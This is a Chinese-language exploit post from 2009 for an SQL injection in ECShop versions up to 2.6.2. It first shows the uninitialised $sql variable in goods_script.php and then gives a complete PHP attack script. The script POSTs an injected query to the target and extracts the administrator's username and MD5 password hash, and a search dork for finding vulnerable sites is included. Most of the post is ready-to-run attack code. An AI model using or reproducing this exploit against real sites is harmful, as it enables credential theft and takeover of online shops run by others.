ECShop <= v2.6.2 注入漏洞利用工具exploit

ECShop <= v2.6.2 注入漏洞利用工具exploit ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit

作者：Ryat 2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

1
    if (empty($_GET['type']))
2
    {
3
        ...
4
    }
5
    elseif ($_GET['type'] == 'collection')
6
    {
7
        ...
8
    }
9
    $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
10
    $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

Exploit:

1
#!/usr/bin/php
2
<?php
3

4
print_r('
5
+---------------------------------------------------------------------------+
6
[ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit](/blog/ecshop-v262-sql-injection)
7
by puret_t
8
mail: puretot at gmail dot com
9
team: <http://bbs.wolvez.org>
10
dork: "Powered by ECShop"
11
+---------------------------------------------------------------------------+
12
');
13
/\*\*
14
 \* works with register_globals = On
15
 \*/
67 collapsed lines
16
if ($argc < 3) {
17
    print_r('
18
+---------------------------------------------------------------------------+
19
Usage: php '.$argv[0].' host path
20
host:      target server (ip/hostname)
21
path:      path to ecshop
22
Example:
23
php '.$argv[0].' localhost /ecshop/
24
+---------------------------------------------------------------------------+
25
');
26
    exit;
27
}
28

29
error_reporting(7);
30
ini_set('max_execution_time', 0);
31

32
$host = $argv[1];
33
$path = $argv[2];
34

35
$resp = send();
36
preg_match('#href="([S]+):([a-z0-9]{32})"#', $resp, $hash);
37

38
if ($hash)
39
    exit("Expoilt Success!
40
admin: $hash[1]
41
Password(md5): $hash[2]
42
");
43
else
44
    exit("Exploit Failed!
45
");
46

47
function send()
48
{
49
    global $host, $path;
50

51
    $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
52

53
    $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1
54
";
55
    $data .= "Accept: \*/\*
56
";
57
    $data .= "Accept-Language: zh-cn
58
";
59
    $data .= "Content-Type: application/x-www-form-urlencoded
60
";
61
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
62
";
63
    $data .= "Host: $host
64
";
65
    $data .= "Content-Length: ".strlen($cmd)."
66
";
67
    $data .= "Connection: Close
68
";
69
    $data .= $cmd;
70

71
    $fp = fsockopen($host, 80);
72
    fputs($fp, $data);
73

74
    $resp = '';
75

76
    while ($fp && !feof($fp))
77
        $resp .= fread($fp, 1024);
78

79
    return $resp;
80
}
81

82
?>